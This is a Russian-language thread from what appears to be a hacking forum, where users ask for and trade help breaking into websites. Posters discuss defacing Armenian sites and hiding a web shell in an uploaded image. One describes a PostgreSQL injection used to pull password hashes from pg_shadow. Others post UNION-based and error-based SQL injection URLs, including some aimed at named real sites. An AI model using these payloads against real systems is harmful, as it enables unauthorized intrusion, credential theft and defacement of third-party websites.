снова из Азербайджанa, и сново дефейс Армянских сайтов? не одобряю... --------- p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом..
Нет, я конечно понимаю, жара и всё такое, но ты разве k2b1~ ? Почему ты мне пишешь про какие-то логи апача? Что за хрень вы тут понаписали вообще на последних двух страницах?) Один просит как залить шелл ВМЕСТО картинки из админки (обойти фильтр на разрешение и т.д.), ему советуют вставить в конец картинки код, тот главное потом пишет спасибо (зохавал видать все интырнеты уже новым способом), теперь ты со своими логами - у дурки день открытых дверей?)))) Или там было написано "у меня кроме админки еще есть LFI"???)))
2 Konqi: Твоя тема аж на 1399 странице, посмотри номер этой, ты что, правда думаешь, так можно строить диалог? И с чего ты взял, что вот так вот просто можно через 3 страницы и два дня писать: "p.s Pashkel я там нашел логи апача , но как не странно файлы пустые, как это возможно? запросы передаются гетом.." и надеяться на то, что тебя поймут? Тем более ты же дальше пишешь уже про еще 10 ДРУГИХ сайтов - с логикой напряги?))) главное "я там нашел" - ыыыыыыыыы
Здравствуйте уважаемые гуру и не только. Есть небольшая проблемка: есть иньекция postgresql 7.4 но иньекция в жопашном месте - select ххх from(select '123%INJ%' as code) as listcode left join то left join это и так далее с толпой сложных и малопонятных джойнов. Само собой простой комментарий -- все не комментирует, так что если поставить ; И написать свой запрос будет лишь ошибка. Ошибки выводятся так что данные из бд получить проблем нет, темболее что пользователь суперюзер. Проблема в том что хочу в админку. А она сцука под паролем в htaccess. а без отдельного sql запроса файл, как я поглядел в мануалах, не прочитать. Ну я подумал что не проблема - можно подключиться напрямую к серверу бд, ибо доступ к pg_shadow есть. Проблема в том что Code: array_to_string(array(select passwd::text from pg_shadow+where+usename=getpgusername()),','::text) ругается нехорошими словами Query failed: ERROR: значения NULL как элементы массива не поддерживается. Эта ошибка ставит меня в тупик честно говоря - подумал ну мало-ли бывают пустые пароли. но блин какой запрос не составляй - хоть с array хоть без него подтвердить что в базе есть пользователи с не null паролями так и не смог. Странно короче. Пы.Сы: таблиц с пользователями в различных бд этого сервака хренова туча все пароли админов не протестил но те что проверил к хтаксессу не подходят.
можно, если будет LFI в студию, откуда я знаю, что за логи апача ты там подключаешь и откуда ты берешь к ним пути и видно ли ошибки вообще и т.д.
вопрос такой: есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id index.php?id=-37+union+select+1,2/* index.php?id=3111117+union+select+1,2/* index.php?id=37+and+1=2+union+select+1,2/* скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
попробуй типа этого... index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema.tables+limit+0,1/* есле 5тая версия.. а не какайта там 3-тья иле четвертая.. и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал. -> +AND+substring(version,1,1)=5
[Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода. durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого index.php?id=37+and+if(5=4,NULL,NUll)+union+select+1,2/* но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу index.php?id=37+and+1=2+union+select+1,2/*
Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса: index.php?id=37+limit+0+union+select+1,2/* Ну или так: index.php?id=37+union+select+1,2+limit+1,1/*
Code: http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/* в первом случае The profile is not active! во-втором тоже самое http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80+limit+0,1/* проходит, но толку
